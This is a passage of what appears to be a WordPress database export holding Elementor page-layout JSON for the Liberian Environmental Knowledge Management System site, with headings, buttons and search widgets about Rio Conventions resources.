center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6123,554,'_elementor_version','2.7.5'),(6124,554,'_elementor_template_type','wp-page'),(6125,554,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6134,556,'_wp_page_template','default'),(6135,556,'_elementor_edit_mode','builder'),(6136,556,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 